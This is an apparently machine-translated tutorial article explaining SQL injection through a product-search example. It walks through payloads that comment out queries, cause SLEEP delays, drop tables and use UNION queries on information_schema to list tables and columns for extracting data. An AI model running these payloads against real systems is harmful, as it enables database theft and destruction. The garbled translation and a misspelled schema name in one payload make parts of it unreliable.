Shulou(Shulou.com)05/31 Report--

This article mainly introduces the basic principles of sql injection, has a certain reference value, interested friends can refer to, I hope you can learn a lot after reading this article, the following let the editor take you to understand it.

Basic principles of SQL injection

WEB technology is changing with each passing day, but the traditional craftsmanship of freehand SQL is still favored by a considerable number of developers. After all, it is more convenient and intuitive to spell by hand than to learn a complex set of ORM rules. Usually people who spell SQL by themselves should have heard that SQL injection is dangerous, but always think: my SQL statement is so simple, it is impossible to be injected.

Take 5 minutes to read this complete example, you should never dare to take any more chances from now on.

Simple scene

There is a WEB interface to enter the product name, showing the corresponding price, production date and place of production information. For example, enter Hammer to display:

Product price place of production date of production Claw Hammer12.98American2019.11.07Club Hammer29.98Canada2019.11.11

We skipped the process of building the Web search interface and focused on the key part: SQL injection.

If we want to achieve the above functions, we can roughly guess that the SQL statement used by the server is as follows:

SELECT? FROM? WHERE? LIKE'% Hammer%'

Among them? It means that we do not know the specific table name and field name at this time, and the only thing that can be manipulated in this SQL is the input'% Hammer% in single quotes. Suppose we enter a single quotation mark directly in the search box. That is to become

Select? From? Where? Like'%'

This splicing results in SQL syntax errors and no results, so we need to use-- to comment out the last single quotation mark.

Select? From? Where? Like'%';--%'

-- followed by comments (you can also use #), so you can get all the product information, and so far, there is still no sign of danger.

Product price place of production date of production Claw Hammer12.98American2019.11.07Club Hammer29.98Canada2019.11.11Paring Knife10.98China2019.11.11Boning Knife19.98China2019.01.01

Try the cow knife and

Hold on to the single quotation marks that can be extended in the previous step. Try a simple delay statement:

Select? From? Where? Like'% Hammer%' and 1 = SLEEP (2);--%'

At this time, the query will not return the result until 2 seconds later. If you extend the time and use a few more queries with the script, you will be able to use up the connection pool of the database.

Of course, there are more destructive ones!

Select? From? Where? Like'% Hammer%'; drop table xxxx;--%'

You can delete the table / database directly, but how do you know which tables are in the reference database (that is, how to determine the xxxx in the previous sentence SQL)?

Do whatever you want, union.

We need to know which tables are in this database! Only in this way can we get useful information.

Using union, you can put the contents of different tables together and give it a try:

Select?,? From? Where? Like'% Hammer%' UNION (select 1, 2, 3, 4, from dual);--%'; price, place of production, date of production, Claw Hammer12.98American2019.11.07Club Hammer29.98Canada2019.11.111234

You can see that we successfully stitched the false data 1, 2, 3, 4 into the search results.

The information contained in the Mysql system is stored in the information_schema database. We try to find useful information in it.

Select? From? Where? Like'% Hammer%' UNION (select TABLE_NAME,TABLE_SCHEMA,3,4 from information_schema.tables);--%'; price, place of production, date of production Claw Hammer12.98American2019.11.07Club Hammer29.98Canada2019.11.11authorshawkeye34productshawkeye34userhawkeye34.34

Now that we know these database and table names, everyone can do whatever they want with it! (including the DROP executed above).

Look at the list and guess that we are currently looking at the products table, and then we will dig out the specific fields of products.

Select? From? Where? Like'% Hammer%' UNION (select COLUMN_NAME,TABLE_SCHEMA,3,4 from imformation_schema.columns where table_name = 'products');--%'; price, place of production, date of production Claw Hammer12.98American2019.11.07Club Hammer29.98Canada2019.11.11idhawkeye34namehawkeye34pricehawkeye34addresshawkeye34updated_athawkeye34

So, through the above two steps, we know the table name and field name, so the complete SQL for querying API should be (put the above? It's all made up):

Select name,price,address,updated_at from products where name like'% Hammer%'

By repeating the above steps over and over again, you can transfer all the information in the database (such as the user table found above) through this small entry

Thank you for reading this article carefully. I hope the article "what are the basic principles of sql injection" shared by the editor will be helpful to you. At the same time, I also hope that you will support us and pay attention to the industry information channel. More related knowledge is waiting for you to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.